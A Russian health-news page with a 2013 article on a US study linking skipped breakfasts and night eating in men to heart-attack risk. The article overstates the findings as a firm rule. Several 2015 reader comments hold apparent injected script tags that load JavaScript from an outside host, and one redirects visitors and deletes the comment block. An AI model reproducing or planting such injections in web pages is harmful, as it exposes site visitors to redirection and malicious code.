Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Пропустил завтрак – получ...  >>  Пропустил завтрак – получай инфаркт! Шокирующее исследование из США
 
Обратная связь
 

Пропустил завтрак – получай инфаркт! Шокирующее исследование из США

Размер шрифта
09 сентября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

В США завершилось масштабное кардиологическое исследование. Его результаты можно охарактеризовать как революционные: выяснилось, что мужчины, которые не завтракают или много едят на ночь, имеют повышенный риск развития инфаркта миокарда!

482x351_propustil_zavtrak_poluchay_infarkt_shokiruyuschee_issledovanie_iz_ssha

Это исследование является исключительным по нескольким причинам. Во-первых, оно длилось 16 лет (с 1992 по 2008 год). Во-вторых, в нем участвовало почти 27 000 мужчин. В третьих, все они были работниками здравоохранения! Ничего удивительного в этом нет: врачи, средний и младший медицинский персонал – очень удобный контингент для научных статистических исследований: они не теряются из поля зрения, лучше понимают суть научной работы и охотнее идут на встречу.

Ученые опрашивали их относительно режима питания и пищевых привычек, а также отслеживали любые изменения со стороны их здоровья. Выяснились следующие факты:

  • У мужчин, которые регулярно пропускают завтрак, риск инфаркта миокарда и внезапной сердечной смерти выше на 27% в сравнении с теми, кто завтракает всегда.
  • Среднестатистический портрет мужчины, пропускающего завтрак: молодой возраст, курильщик, работает на полную ставку, не женат, ведет малоподвижный образ жизни и склонен к употреблению алкоголя.
  • У мужчин, которых любят поесть ночью, риск ишемической болезни сердца повышается на 55%. Впрочем, в исследуемой группе оказалось очень мало лиц с подобным пищевым поведением.
  • В ходе исследования у 1 572 мужчин случился инфаркт миокарда или эпизод другой острой кардиологической патологии.

«Безответственное отношение к завтраку приводит к активизации других серьезных факторов риска для здоровья сердца, таких как ожирение, артериальная гипертония, диабет, высокий холестерин и другие. Эти факторы, в свою очередь, стремительно приближают ваше сердце к инфаркту», – рассказывает Ли Кэхилл, ведущий научный сотрудник исследовательской группы.

«В течение десятилетий мы изучали влияние диеты и режима питания на кардиологическое здоровье и вот, наконец, наша работа принесла потрясающие плоды», – добавляет он.

Опросники, которые заполняли испытуемые, включали в себя вопросы и на другие темы, помимо питания. Ученых интересовали такие аспекты, как характер досуга участников (смотрят ли они телевизор, занимаются ли спортом и так далее), благополучие их сна, вредные привычки, сопутствующие заболевания, особенности труда, семейное положение и так далее.

Несмотря на исполинские масштабы проведенной работы, она, к сожалению, не является всеобъемлющей. Мало того, что все испытуемые были мужчинами, так еще и 97% из них относились к европеоидной расе. Влияние режима питания на частоту инфаркта среди женщин и представителей других этнических групп еще предстоит изучить в будущем.

Но в любом случае, очевидно, что завтрак пропускать нельзя! И если вам безразлична ваша фигура, то уж о сердце-то своем подумайте – без него жить нельзя!

Ну, и как всегда, к вашим услугам бездонный источник информации о правильном питании и похудении– наш специальный проект «Сбрось лишнее».

Результаты данного исследования были опубликованы в журнале «Кровообращение» (Circulation), который курируется Американской Кардиологической Ассоциацией.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Leonid

19 сентября 2013 в 19:36

Цитировать   |   Пожаловаться

Это исследование подтверждает известное выражение великого русского непобедимого полководца-генералиссимуса А. В. Суворова о том, что "Завтрак съешь сам, обед раздели с другом, а ужин - отдай врагу!"

2 - zzzzzz

30 июня 2015 в 19:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 19:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 23:04

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как угробить свое сердце?!   Не психуй! Взрывы гнева увеличивают шансы инфаркта!   Еще один повод ходить на работу! Бедные умирают в 2 раза чаще богатых!   Перекус, который заставит вас купить штаны на размер меньше в Новом году  
22 июня 2013Грецкие орехи спасут от инфаркта 20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 04 июня 2013У вас лысый муж? Он может умереть от инфаркта
 

Слайдшоу

1
6 суперпродуктов от диабета
Чем страшен диабет?
Зачем спать 10 затем

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Грозит ли вам инфаркт миокарда?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.